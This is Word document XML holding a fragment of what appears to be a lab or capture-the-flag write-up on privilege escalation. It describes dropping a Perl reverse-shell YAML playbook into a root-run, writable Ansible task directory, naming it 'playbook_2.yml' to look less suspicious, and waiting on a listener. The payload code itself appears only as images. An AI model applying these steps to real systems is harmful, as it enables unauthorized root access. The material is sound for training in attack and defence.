          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>We see that all the .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> files in the /opt/automation/tasks directory are getting executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C2A9F7" w14:textId="29CC9495" w:rsidR="006D25C3" w:rsidRDefault="006D25C3" w:rsidP="006D25C3">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">We see that se system that sleeps for 10 seconds, deletes all the file in /opt/automation/tasks </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>and than</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> copies playbook_1.yml form /root back to </w:t>
      </w:r>
      <w:r w:rsidR="006470E0">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/opt/automation/tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BACBC5" w14:textId="1FA79737" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Based on the results of pspy64, we should be able to make our own .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> file in /opt/automation/tasks, and it should get executed on root, IF we have write rights in that directory. After checking if we can make our own files, it turns out we absolutely could!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C827FF8" w14:textId="49091168" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BEDADDA" w14:textId="07C93CEB" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">When checking all the files on the machine, I saw that the machine has </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> installed. So we’re </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>gonna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> make a .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> file with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>yaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> code that executes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> code on root that gives us a reverse shell: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67312CEC" w14:textId="28B0654A" w:rsidR="006470E0" w:rsidRPr="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="033EC43E" wp14:editId="0749165E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>34290</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7591739" cy="1150620"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapNone/>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609903" cy="11533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E81A9" w14:textId="2D6C1204" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6775AEA6" w14:textId="5461F803" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D7467DA" w14:textId="21B7887D" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5507A37A" w14:textId="5530E0FC" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18374665" w14:textId="51DDF87C" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26018983" w14:textId="5C7640F1" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="784C1037" w14:textId="5649CE9A" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Name this file playbook_2.yml, to make it less suspicious.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A884E8F" w14:textId="06CE6073" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload it to the right directory: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497B1FF0" w14:textId="3D989086" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7A3459E1" wp14:editId="45F7C358">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>441960</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>10160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="1658620"/>
            <wp:effectExtent l="0" t="0" r="254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58620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FF71FD" w14:textId="7E965B70" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E93DAE6" w14:textId="18D3FD12" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F2B01ED" w14:textId="459B51CA" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A923E9" w14:textId="6A4D0AC4" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4254B44C" w14:textId="4D51F4FC" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7445D71F" w14:textId="34F828AF" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FCD870D" w14:textId="7D827D27" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EBDAD88" w14:textId="3D6B2327" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40298DBF" w14:textId="063010AA" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED5908B" w14:textId="7AA9BC55" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251683840" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5C2AE876" wp14:editId="3D196013">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1036320</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>187960</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4213860" cy="1981314"/>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3860" cy="19813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Start a listener on port 6969, and wait till we get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>RevShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DEC07B" w14:textId="63576240" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D0241A0" w14:textId="5CAB0FF9" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2990B07B" w14:textId="4F05AC35" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27AC4C6A" w14:textId="17FC4C36" w:rsidR="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C0FE7CE" w14:textId="55868103" w:rsidR="006470E0" w:rsidRPr="006470E0" w:rsidRDefault="006470E0" w:rsidP="006470E0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006470E0" w:rsidRPr="006470E0" w:rsidSect="005F12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A604C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="95402DB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2E55B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D8667434"/>
    <w:lvl w:ilvl="0" w:tplc="FC6C6A06">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04130019">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0413001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0413000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04130019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0413001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6120" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0413000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6840" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04130019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7560" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0413001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="8280" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="423B2022"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E6C25C76"/>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20D5097"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="253E0582"/>
    <w:lvl w:ilvl="0" w:tplc="3CD8976A">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16cid:durableId="2062556506">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1655452715">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1419715939">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1517118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EFC"/>
    <w:rsid w:val="00035778"/>
    <w:rsid w:val="000613E1"/>
    <w:rsid w:val="001D6DE2"/>
    <w:rsid w:val="001E04FE"/>
    <w:rsid w:val="0039004D"/>
    <w:rsid w:val="004B5CE9"/>
    <w:rsid w:val="004F115B"/>
    <w:rsid w:val="004F4F3D"/>
    <w:rsid w:val="00537109"/>
    <w:rsid w:val="005B2E84"/>
    <w:rsid w:val="005D78BD"/>
    <w:rsid w:val="005F1267"/>
    <w:rsid w:val="005F35F3"/>
    <w:rsid w:val="00610EBF"/>
    <w:rsid w:val="006470E0"/>
    <w:rsid w:val="006838A8"/>
    <w:rsid w:val="006B6C84"/>
    <w:rsid w:val="006D25C3"/>
    <w:rsid w:val="006E2EFC"/>
    <w:rsid w:val="00701D39"/>
    <w:rsid w:val="008104C3"/>
    <w:rsid w:val="00853BA7"/>
    <w:rsid w:val="00941359"/>
    <w:rsid w:val="009E520F"/>
    <w:rsid w:val="00B230A7"/>
    <w:rsid w:val="00B40BC9"/>
    <w:rsid w:val="00BC2085"/>
    <w:rsid w:val="00C37B9B"/>
    <w:rsid w:val="00C5299B"/>
    <w:rsid w:val="00D40DC8"/>
    <w:rsid w:val="00E93830"/>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4C75A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{48408FDA-2995-4D2C-8869-2295A5F8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37B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813863">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="180226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2903</Words>
  <Characters>15968</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Alhazina</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Alhazina,Saïd S.</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-16T12:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-16T12:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>